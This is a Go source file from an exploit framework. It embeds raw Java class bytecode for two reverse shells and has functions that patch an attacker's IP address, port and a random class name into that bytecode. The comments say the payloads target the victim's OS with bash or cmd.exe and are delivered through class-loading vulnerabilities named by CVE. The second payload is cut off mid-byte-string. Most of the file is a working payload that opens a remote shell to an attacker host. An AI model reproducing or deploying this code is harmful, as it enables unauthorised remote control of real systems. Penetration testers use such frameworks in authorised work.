package java

import (
	"encoding/binary"
	"strconv"
	"strings"

	"github.com/vulncheck-oss/go-exploit/config"
	"github.com/vulncheck-oss/go-exploit/random"
	"github.com/vulncheck-oss/go-exploit/transform"
)

// This is the Java bytecode for a reverse shell. You can find the source code here:
//
// https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
//
// The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly.
// The use case for this is when remotely loading a class (see CVE-2020-7961) or loading
// a class from a byte string (see CVE-2023-22527).
//
// The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
//
//	albinolobster@mournland:/tmp/java$ java -version
//	openjdk version "1.8.0_392"
//	OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08)
//	OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode)
//	albinolobster@mournland:/tmp/java$ javac ABCDEFG.java
//	albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class
//	-rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class
//
// This function replaces hardcoded IP address and port in the bytecode and generates
// a random class name. The return values are (bytecode, classname).
func ReverseShellBytecode(conf *config.Config) (string, string) {
	reverseShell := "\xca\xfe\xba\xbe\x00\x00\x00\x34\x00\xa0\x0a\x00" +
		"\x32\x00\x45\x08\x00\x46\x08\x00\x47\x0a\x00\x48" +
		"\x00\x49\x08\x00\x4a\x0a\x00\x09\x00\x4b\x08\x00" +
		"\x4c\x07\x00\x4d\x07\x00\x4e\x0a\x00\x08\x00\x4f" +
		"\x0a\x00\x08\x00\x50\x0a\x00\x08\x00\x51\x07\x00" +
		"\x52\x07\x00\x53\x08\x00\x54\x08\x00\x55\x0a\x00" +
		"\x56\x00\x57\x0a\x00\x0d\x00\x58\x07\x00\x59\x07" +
		"\x00\x5a\x0a\x00\x0d\x00\x5b\x0a\x00\x14\x00\x5c" +
		"\x0a\x00\x13\x00\x5d\x07\x00\x5e\x07\x00\x5f\x0a" +
		"\x00\x0d\x00\x60\x0a\x00\x19\x00\x61\x0a\x00\x18" +
		"\x00\x62\x0a\x00\x63\x00\x60\x0a\x00\x63\x00\x5b" +
		"\x0a\x00\x0d\x00\x64\x0a\x00\x13\x00\x65\x07\x00" +
		"\x66\x0a\x00\x21\x00\x45\x0a\x00\x21\x00\x67\x08" +
		"\x00\x68\x0a\x00\x21\x00\x69\x0a\x00\x18\x00\x6a" +
		"\x0a\x00\x18\x00\x6b\x05\x00\x00\x00\x00\x00\x00" +
		"\x00\x32\x0a\x00\x6c\x00\x6d\x0a\x00\x13\x00\x6e" +
		"\x0a\x00\x13\x00\x6f\x0a\x00\x18\x00\x70\x0a\x00" +
		"\x63\x00\x71\x07\x00\x72\x0a\x00\x63\x00\x73\x0a" +
		"\x00\x0d\x00\x74\x07\x00\x75\x01\x00\x04\x68\x6f" +
		"\x73\x74\x01\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x01" +
		"\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61" +
		"\x6c\x75\x65\x01\x00\x04\x70\x6f\x72\x74\x01\x00" +
		"\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29" +
		"\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c" +
		"\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" +
		"\x6c\x65\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" +
		"\x70\x54\x61\x62\x6c\x65\x07\x00\x53\x07\x00\x4e" +
		"\x07\x00\x76\x07\x00\x52\x07\x00\x59\x07\x00\x5e" +
		"\x07\x00\x72\x01\x00\x0a\x53\x6f\x75\x72\x63\x65" +
		"\x46\x69\x6c\x65\x01\x00\x0c\x41\x42\x43\x44\x45" +
		"\x46\x47\x2e\x6a\x61\x76\x61\x0c\x00\x37\x00\x38" +
		"\x01\x00\x04\x62\x61\x73\x68\x01\x00\x07\x6f\x73" +
		"\x2e\x6e\x61\x6d\x65\x07\x00\x77\x0c\x00\x78\x00" +
		"\x79\x01\x00\x07\x57\x69\x6e\x64\x6f\x77\x73\x0c" +
		"\x00\x7a\x00\x7b\x01\x00\x07\x63\x6d\x64\x2e\x65" +
		"\x78\x65\x01\x00\x18\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" +
		"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x0c\x00\x37\x00\x7c\x0c\x00\x7d\x00\x7e\x0c\x00" +
		"\x7f\x00\x80\x01\x00\x0f\x6a\x61\x76\x61\x2f\x6e" +
		"\x65\x74\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" +
		"\x41\x42\x43\x44\x45\x46\x47\x01\x00\x08\x41\x41" +
		"\x41\x41\x41\x41\x41\x41\x01\x00\x08\x42\x42\x42" +
		"\x42\x42\x42\x42\x42\x07\x00\x81\x0c\x00\x82\x00" +
		"\x7b\x0c\x00\x37\x00\x83\x01\x00\x16\x6a\x61\x76" +
		"\x61\x2f\x69\x6f\x2f\x42\x75\x66\x66\x65\x72\x65" +
		"\x64\x52\x65\x61\x64\x65\x72\x01\x00\x19\x6a\x61" +
		"\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74\x53" +
		"\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x0c" +
		"\x00\x84\x00\x85\x0c\x00\x37\x00\x86\x0c\x00\x37" +
		"\x00\x87\x01\x00\x16\x6a\x61\x76\x61\x2f\x69\x6f" +
		"\x2f\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69" +
		"\x74\x65\x72\x01\x00\x1a\x6a\x61\x76\x61\x2f\x69" +
		"\x6f\x2f\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" +
		"\x61\x6d\x57\x72\x69\x74\x65\x72\x0c\x00\x88\x00" +
		"\x89\x0c\x00\x37\x00\x8a\x0c\x00\x37\x00\x8b\x07" +
		"\x00\x76\x0c\x00\x8c\x00\x8d\x0c\x00\x8e\x00\x8f" +
		"\x01\x00\x17\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
		"\x2f\x53\x74\x72\x69\x6e\x67\x42\x75\x69\x6c\x64" +
		"\x65\x72\x0c\x00\x90\x00\x91\x01\x00\x01\x0a\x0c" +
		"\x00\x92\x00\x8f\x0c\x00\x93\x00\x94\x0c\x00\x95" +
		"\x00\x38\x07\x00\x96\x0c\x00\x97\x00\x98\x0c\x00" +
		"\x99\x00\x8d\x0c\x00\x9a\x00\x9b\x0c\x00\x93\x00" +
		"\x9c\x0c\x00\x9d\x00\x9b\x01\x00\x13\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70" +
		"\x74\x69\x6f\x6e\x0c\x00\x9e\x00\x38\x0c\x00\x9f" +
		"\x00\x38\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x01\x00\x11" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72" +
		"\x6f\x63\x65\x73\x73\x01\x00\x10\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x79\x73\x74\x65\x6d" +
		"\x01\x00\x0b\x67\x65\x74\x50\x72\x6f\x70\x65\x72" +
		"\x74\x79\x01\x00\x26\x28\x4c\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b" +
		"\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x53\x74\x72\x69\x6e\x67\x3b\x01\x00\x07\x69\x6e" +
		"\x64\x65\x78\x4f\x66\x01\x00\x15\x28\x4c\x6a\x61" +
		"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69" +
		"\x6e\x67\x3b\x29\x49\x01\x00\x16\x28\x5b\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" +
		"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72\x65\x64" +
		"\x69\x72\x65\x63\x74\x45\x72\x72\x6f\x72\x53\x74" +
		"\x72\x65\x61\x6d\x01\x00\x1d\x28\x5a\x29\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f" +
		"\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" +
		"\x01\x00\x05\x73\x74\x61\x72\x74\x01\x00\x15\x28" +
		"\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x50\x72\x6f\x63\x65\x73\x73\x3b\x01\x00\x11\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" +
		"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72\x73\x65" +
		"\x49\x6e\x74\x01\x00\x16\x28\x4c\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74\x49\x6e" +
		"\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00\x17" +
		"\x28\x29\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x49" +
		"\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" +
		"\x00\x18\x28\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f" +
		"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x3b" +
		"\x29\x56\x01\x00\x13\x28\x4c\x6a\x61\x76\x61\x2f" +
		"\x69\x6f\x2f\x52\x65\x61\x64\x65\x72\x3b\x29\x56" +
		"\x01\x00\x0f\x67\x65\x74\x4f\x75\x74\x70\x75\x74" +
		"\x53\x74\x72\x65\x61\x6d\x01\x00\x18\x28\x29\x4c" +
		"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" +
		"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x19" +
		"\x28\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f\x75" +
		"\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x29" +
		"\x56\x01\x00\x13\x28\x4c\x6a\x61\x76\x61\x2f\x69" +
		"\x6f\x2f\x57\x72\x69\x74\x65\x72\x3b\x29\x56\x01" +
		"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64\x01\x00" +
		"\x03\x28\x29\x5a\x01\x00\x08\x72\x65\x61\x64\x4c" +
		"\x69\x6e\x65\x01\x00\x14\x28\x29\x4c\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
		"\x67\x3b\x01\x00\x06\x61\x70\x70\x65\x6e\x64\x01" +
		"\x00\x2d\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
		"\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" +
		"\x69\x6e\x67\x42\x75\x69\x6c\x64\x65\x72\x3b\x01" +
		"\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x01\x00" +
		"\x05\x77\x72\x69\x74\x65\x01\x00\x15\x28\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" +
		"\x69\x6e\x67\x3b\x29\x56\x01\x00\x05\x66\x6c\x75" +
		"\x73\x68\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x54\x68\x72\x65\x61\x64\x01\x00\x05" +
		"\x73\x6c\x65\x65\x70\x01\x00\x04\x28\x4a\x29\x56" +
		"\x01\x00\x05\x72\x65\x61\x64\x79\x01\x00\x04\x72" +
		"\x65\x61\x64\x01\x00\x03\x28\x29\x49\x01\x00\x04" +
		"\x28\x49\x29\x56\x01\x00\x09\x65\x78\x69\x74\x56" +
		"\x61\x6c\x75\x65\x01\x00\x07\x64\x65\x73\x74\x72" +
		"\x6f\x79\x01\x00\x05\x63\x6c\x6f\x73\x65\x00\x21" +
		"\x00\x0e\x00\x32\x00\x00\x00\x02\x00\x18\x00\x33" +
		"\x00\x34\x00\x01\x00\x35\x00\x00\x00\x02\x00\x0f" +
		"\x00\x18\x00\x36\x00\x34\x00\x01\x00\x35\x00\x00" +
		"\x00\x02\x00\x10\x00\x01\x00\x01\x00\x37\x00\x38" +
		"\x00\x01\x00\x39\x00\x00\x01\xeb\x00\x06\x00\x0b" +
		"\x00\x00\x01\x03\x2a\xb7\x00\x01\x12\x02\x4c\x12" +
		"\x03\xb8\x00\x04\x12\x05\xb6\x00\x06\x02\x9f\x00" +
		"\x06\x12\x07\x4c\xbb\x00\x08\x59\x04\xbd\x00\x09" +
		"\x59\x03\x2b\x53\xb7\x00\x0a\x04\xb6\x00\x0b\xb6" +
		"\x00\x0c\x4d\xbb\x00\x0d\x59\x12\x0f\x12\x10\xb8" +
		"\x00\x11\xb7\x00\x12\x4e\xbb\x00\x13\x59\xbb\x00" +
		"\x14\x59\x2d\xb6\x00\x15\xb7\x00\x16\xb7\x00\x17" +
		"\x3a\x04\xbb\x00\x18\x59\xbb\x00\x19\x59\x2d\xb6" +
		"\x00\x1a\xb7\x00\x1b\xb7\x00\x1c\x3a\x05\xbb\x00" +
		"\x18\x59\xbb\x00\x19\x59\x2c\xb6\x00\x1d\xb7\x00" +
		"\x1b\xb7\x00\x1c\x3a\x06\xbb\x00\x13\x59\xbb\x00" +
		"\x14\x59\x2c\xb6\x00\x1e\xb7\x00\x16\xb7\x00\x17" +
		"\x3a\x07\x2d\xb6\x00\x1f\x9a\x00\x64\x19\x04\xb6" +
		"\x00\x20\x59\x3a\x08\xc6\x00\x21\x19\x06\xbb\x00" +
		"\x21\x59\xb7\x00\x22\x19\x08\xb6\x00\x23\x12\x24" +
		"\xb6\x00\x23\xb6\x00\x25\xb6\x00\x26\x19\x06\xb6" +
		"\x00\x27\x14\x00\x28\xb8\x00\x2a\x03\x36\x09\x19" +
		"\x07\xb6\x00\x2b\x99\x00\x18\x19\x07\xb6\x00\x2c" +
		"\x59\x36\x09\x9e\x00\x0d\x19\x05\x15\x09\xb6\x00" +
		"\x2d\xa7\xff\xe6\x19\x05\xb6\x00\x27\x2c\xb6\x00" +
		"\x2e\x57\xa7\x00\x08\x3a\x0a\xa7\xff\x9b\x2c\xb6" +
		"\x00\x30\x2d\xb6\x00\x31\xa7\x00\x04\x4c\xb1\x00" +
		"\x02\x00\xe9\x00\xee\x00\xf1\x00\x2f\x00\x04\x00" +
		"\xfe\x01\x01\x00\x2f\x00\x02\x00\x3a\x00\x00\x00" +
		"\x72\x00\x1c\x00\x00\x00\x0f\x00\x04\x00\x11\x00" +
		"\x07\x00\x12\x00\x15\x00\x13\x00\x18\x00\x16\x00" +
		"\x2f\x00\x17\x00\x3e\x00\x18\x00\x52\x00\x19\x00" +
		"\x66\x00\x1a\x00\x7a\x00\x1b\x00\x8e\x00\x1d\x00" +
		"\x95\x00\x1f\x00\xa0\x00\x20\x00\xb9\x00\x21\x00" +
		"\xbe\x00\x23\x00\xc4\x00\x25\x00\xc7\x00\x26\x00" +
		"\xda\x00\x27\x00\xe4\x00\x29\x00\xe9\x00\x2b\x00" +
		"\xee\x00\x2c\x00\xf1\x00\x2d\x00\xf3\x00\x2f\x00" +
		"\xf6\x00\x31\x00\xfa\x00\x32\x00\xfe\x00\x34\x01" +
		"\x01\x00\x33\x01\x02\x00\x35\x00\x3b\x00\x00\x00" +
		"\x4e\x00\x09\xff\x00\x18\x00\x02\x07\x00\x3c\x07" +
		"\x00\x3d\x00\x00\xff\x00\x75\x00\x08\x07\x00\x3c" +
		"\x07\x00\x3d\x07\x00\x3e\x07\x00\x3f\x07\x00\x40" +
		"\x07\x00\x41\x07\x00\x41\x07\x00\x40\x00\x00\xfc" +
		"\x00\x2f\x07\x00\x3d\xfc\x00\x08\x01\x1c\x4c\x07" +
		"\x00\x42\xf9\x00\x04\xff\x00\x0a\x00\x01\x07\x00" +
		"\x3c\x00\x01\x07\x00\x42\x00\x00\x01\x00\x43\x00" +
		"\x00\x00\x02\x00\x44"

	classSize := make([]byte, 2)
	classString := transform.Title(random.RandLettersRange(8, 17))
	binary.BigEndian.PutUint16(classSize, uint16(len(classString)))

	ipSize := make([]byte, 2)
	binary.BigEndian.PutUint16(ipSize, uint16(len(conf.Lhost)))

	portSize := make([]byte, 2)
	portString := strconv.Itoa(conf.Lport)
	binary.BigEndian.PutUint16(portSize, uint16(len(portString)))

	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x07ABCDEFG", string(classSize)+classString)
	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x08AAAAAAAA", string(ipSize)+conf.Lhost)
	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x08BBBBBBBB", string(portSize)+portString)

	return reverseShell, classString
}

// This is the Java bytecode for a reverse shell. You can find the source code here:
//
// https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a
//
// The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly.
// The use case for this is when remotely loading a class via ScriptEngineManager calling
// URLClassLoader (see CVE-2024-37084)
//
// The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
//
// parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ java -version
// openjdk version "1.8.0_422"
// OpenJDK Runtime Environment (build 1.8.0_422-8u422-b05-1~22.04-b05)
// OpenJDK 64-Bit Server VM (build 25.422-b05, mixed mode)
// parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ javac Reverse.java
// parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ ls -l Reverse.class
// -rw-rw-r-- 1 parallels parallels 3124 Sep 20 12:58 Reverse.class
//
// This function replaces hardcoded IP address and port in the bytecode and generates
// a random class name. The return values are (bytecode, classname).
func ReverseShellScriptingEngineBytecode(conf *config.Config) (string, string) {
	reverseShell := "\xca\xfe\xba\xbe\x00\x00\x00\x34" +
		"\x00\xae\x0a\x00\x32\x00\x55\x08" +
		"\x00\x56\x08\x00\x57\x0a\x00\x58" +
		"\x00\x59\x08\x00\x5a\x0a\x00\x09" +
		"\x00\x5b\x08\x00\x5c\x07\x00\x5d" +
		"\x07\x00\x5e\x0a\x00\x08\x00\x5f" +
		"\x0a\x00\x08\x00\x60\x0a\x00\x08" +
		"\x00\x61\x07\x00\x62\x07\x00\x63" +
		"\x08\x00\x64\x08\x00\x65\x0a\x00" +
		"\x66\x00\x67\x0a\x00\x0d\x00\x68" +
		"\x07\x00\x69\x07\x00\x6a\x0a\x00" +
		"\x0d\x00\x6b\x0a\x00\x14\x00\x6c" +
		"\x0a\x00\x13\x00\x6d\x07\x00\x6e" +
		"\x07\x00\x6f\x0a\x00\x0d\x00\x70" +
		"\x0a\x00\x19\x00\x71\x0a\x00\x18" +
		"\x00\x72\x0a\x00\x3d\x00\x70\x0a" +
		"\x00\x3d\x00\x6b\x0a\x00\x0d\x00" +
		"\x73\x0a\x00\x13\x00\x74\x07\x00" +
		"\x75\x0a\x00\x21\x00\x55\x0a\x00" +
		"\x21\x00\x76\x08\x00\x77\x0a\x00" +
		"\x21\x00\x78\x0a\x00\x18\x00\x79" +
		"\x0a\x00\x18\x00\x7a\x05\x00\x00" +
		"\x00\x00\x00\x00\x00\x32\x0a\x00" +
		"\x7b\x00\x7c\x0a\x00\x13\x00\x7d" +
		"\x0a\x00\x13\x00\x7e\x0a\x00\x18" +
		"\x00\x7f\x0a\x00\x3d\x00\x80\x07" +
		"\x00\x81\x0a\x00\x3d\x00\x82\x0a" +
		"\x00\x0d\x00\x83\x07\x00\x84\x07" +
		"\x00\x85\x01\x00\x04\x68\x6f\x73" +
		"\x74\x01\x00\x12\x4c\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
		"\x74\x72\x69\x6e\x67\x3b\x01\x00" +
		"\x0d\x43\x6f\x6e\x73\x74\x61\x6e" +
		"\x74\x56\x61\x6c\x75\x65\x01\x00" +
		"\x04\x70\x6f\x72\x74\x01\x00\x06" +
		"\x3c\x69\x6e\x69\x74\x3e\x01\x00" +
		"\x03\x28\x29\x56\x01\x00\x04\x43" +
		"\x6f\x64\x65\x01\x00\x0f\x4c\x69" +
		"\x6e\x65\x4e\x75\x6d\x62\x65\x72" +
		"\x54\x61\x62\x6c\x65\x01\x00\x0d" +
		"\x53\x74\x61\x63\x6b\x4d\x61\x70" +
		"\x54\x61\x62\x6c\x65\x07\x00\x86" +
		"\x01\x00\x0d\x67\x65\x74\x45\x6e" +
		"\x67\x69\x6e\x65\x4e\x61\x6d\x65" +
		"\x01\x00\x14\x28\x29\x4c\x6a\x61" +
		"\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x53\x74\x72\x69\x6e\x67\x3b\x01" +
		"\x00\x10\x67\x65\x74\x45\x6e\x67" +
		"\x69\x6e\x65\x56\x65\x72\x73\x69" +
		"\x6f\x6e\x01\x00\x0d\x67\x65\x74" +
		"\x45\x78\x74\x65\x6e\x73\x69\x6f" +
		"\x6e\x73\x01\x00\x12\x28\x29\x4c" +
		"\x6a\x61\x76\x61\x2f\x75\x74\x69" +
		"\x6c\x2f\x4c\x69\x73\x74\x3b\x01" +
		"\x00\x09\x53\x69\x67\x6e\x61\x74" +
		"\x75\x72\x65\x01\x00\x26\x28\x29" +
		"\x4c\x6a\x61\x76\x61\x2f\x75\x74" +
		"\x69\x6c\x2f\x4c\x69\x73\x74\x3c" +
		"\x4c\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
		"\x67\x3b\x3e\x3b\x01\x00\x0c\x67" +
		"\x65\x74\x4d\x69\x6d\x65\x54\x79" +
		"\x70\x65\x73\x01\x00\x08\x67\x65" +
		"\x74\x4e\x61\x6d\x65\x73\x01\x00" +
		"\x0f\x67\x65\x74\x4c\x61\x6e\x67" +
		"\x75\x61\x67\x65\x4e\x61\x6d\x65" +
		"\x01\x00\x12\x67\x65\x74\x4c\x61" +
		"\x6e\x67\x75\x61\x67\x65\x56\x65" +
		"\x72\x73\x69\x6f\x6e\x01\x00\x0c" +
		"\x67\x65\x74\x50\x61\x72\x61\x6d" +
		"\x65\x74\x65\x72\x01\x00\x26\x28" +
		"\x4c\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
		"\x67\x3b\x29\x4c\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" +
		"\x6a\x65\x63\x74\x3b\x01\x00\x13" +
		"\x67\x65\x74\x4d\x65\x74\x68\x6f" +
		"\x64\x43\x61\x6c\x6c\x53\x79\x6e" +
		"\x74\x61\x78\x01\x00\x4b\x28\x4c" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
		"\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x4c\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x53\x74\x72\x69" +
		"\x6e\x67\x3b\x5b\x4c\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
		"\x74\x72\x69\x6e\x67\x3b\x29\x4c" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
		"\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x01\x00\x12\x67\x65\x74\x4f" +
		"\x75\x74\x70\x75\x74\x53\x74\x61" +
		"\x74\x65\x6d\x65\x6e\x74\x01\x00" +
		"\x26\x28\x4c\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x53\x74\x72" +
		"\x69\x6e\x67\x3b\x29\x4c\x6a\x61" +
		"\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x53\x74\x72\x69\x6e\x67\x3b\x01" +
		"\x00\x0a\x67\x65\x74\x50\x72\x6f" +
		"\x67\x72\x61\x6d\x01\x00\x27\x28" +
		"\x5b\x4c\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x53\x74\x72\x69" +
		"\x6e\x67\x3b\x29\x4c\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
		"\x74\x72\x69\x6e\x67\x3b\x01\x00" +
		"\x0f\x67\x65\x74\x53\x63\x72\x69" +
		"\x70\x74\x45\x6e\x67\x69\x6e\x65" +
		"\x01\x00\x1d\x28\x29\x4c\x6a\x61" +
		"\x76\x61\x78\x2f\x73\x63\x72\x69" +
		"\x70\x74\x2f\x53\x63\x72\x69\x70" +
		"\x74\x45\x6e\x67\x69\x6e\x65\x3b" +
		"\x01\x00\x0a\x53\x6f\x75\x72\x63" +
		"\x65\x46\x69\x6c\x65\x01\x00\x0c" +
		"\x52\x65\x76\x65\x72\x73\x65\x2e" +
		"\x6a\x61\x76\x61\x0c\x00\x38\x00" +
		"\x39\x01\x00\x04\x62\x61\x73\x68" +
		"\x01\x00\x07\x6f\x73\x2e\x6e\x61" +
		"\x6d\x65\x07\x00\x87\x0c\x00\x88" +
		"\x00\x4e\x01\x00\x07\x57\x69\x6e" +
		"\x64\x6f\x77\x73\x0c\x00\x89\x00" +
		"\x8a\x01\x00\x07\x63\x6d\x64\x2e" +
		"\x65\x78\x65\x01\x00\x18\x6a\x61" +
		"\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x50\x72\x6f\x63\x65\x73\x73\x42" +
		"\x75\x69\x6c\x64\x65\x72\x01\x00" +
		"\x10\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
		"\x67\x0c\x00\x38\x00\x8b\x0c\x00" +
		"\x8c\x00\x8d\x0c\x00\x8e\x00\x8f" +
		"\x01\x00\x0f\x6a\x61\x76\x61\x2f" +
		"\x6e\x65\x74\x2f\x53\x6f\x63\x6b" +
		"\x65\x74\x01\x00\x07\x52\x65\x76" +
		"\x65\x72\x73\x65\x01\x00\x08\x41" +
		"\x41\x41\x41\x41\x41\x41\x41\x01" +
		"\x00\x08\x42\x42\x42\x42\x42\x42" +
		"\x42\x42\x07\x00\x90\x0c\x00\x91" +
		"\x00\x8a\x0c\x00\x38\x00\x92\x01" +
		"\x00\x16\x6a\x61\x76\x61\x2f\x69" +
		"\x6f\x2f\x42\x75\x66\x66\x65\x72" +
		"\x65\x64\x52\x65\x61\x64\x65\x72" +
		"\x01\x00\x19\x6a\x61\x76\x61\x2f" +
		"\x69\x6f\x2f\x49\x6e\x70\x75\x74" +
		"\x53\x74\x72\x65\x61\x6d\x52\x65" +
		"\x61\x64\x65\x72\x0c\x00\x93\x00" +
		"\x94\x0c\x00\x38\x00\x95\x0c\x00" +
		"\x38\x00\x96\x01\x00\x16\x6a\x61" +
		"\x76\x61\x2f\x69\x6f\x2f\x42\x75" +
		"\x66\x66\x65\x72\x65\x64\x57\x72" +
		"\x69\x74\x65\x72\x01\x00\x1a\x6a" +
		"\x61\x76\x61\x2f\x69\x6f\x2f\x4f" +
		"\x75\x74\x70\x75\x74\x53\x74\x72" +
		"\x65\x61\x6d\x57\x72\x69\x74\x65" +
		"\x72\x0c\x00\x97\x00\x98\x0c\x00" +
		"\x38\x00\x99\x0c\x00\x38\x00\x9a" +
		"\x0c\x00\x9b\x00\x9c\x0c\x00\x9d" +
		"\x00\x3f\x01\x00\x17\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
		"\x74\x72\x69\x6e\x67\x42\x75\x69" +
		"\x6c\x64\x65\x72\x0c\x00\x9e\x00" +
		"\x9f\x01\x00\x01\x0a\x0c\x00\xa0" +
		"\x00\x3f\x0c\x00\xa1\x00\xa2\x0c" +
		"\x00\xa3\x00\x39\x07\x00\xa4\x0c" +
		"\x00\xa5\x00\xa6\x0c\x00\xa7\x00" +
		"\x9c\x0c\x00\xa8\x00\xa9\x0c\x00" +
		"\xa1\x00\xaa\x0c\x00\xab\x00\xa9" +
		"\x01\x00\x13\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x45\x78\x63" +
		"\x65\x70\x74\x69\x6f\x6e\x0c\x00" +
		"\xac\x00\x39\x0c\x00\xad\x00\x39" +
		"\x01\x00\x10\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x4f\x62\x6a" +
		"\x65\x63\x74\x01\x00\x20\x6a\x61" +
		"\x76\x61\x78\x2f\x73\x63\x72\x69" +
		"\x70\x74\x2f\x53\x63\x72\x69\x70" +
		"\x74\x45\x6e\x67\x69\x6e\x65\x46" +
		"\x61\x63\x74\x6f\x72\x79\x01\x00" +
		"\x11\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x50\x72\x6f\x63\x65" +
		"\x73\x73\x01\x00\x10\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
		"\x79\x73\x74\x65\x6d\x01\x00\x0b" +
		"\x67\x65\x74\x50\x72\x6f\x70\x65" +
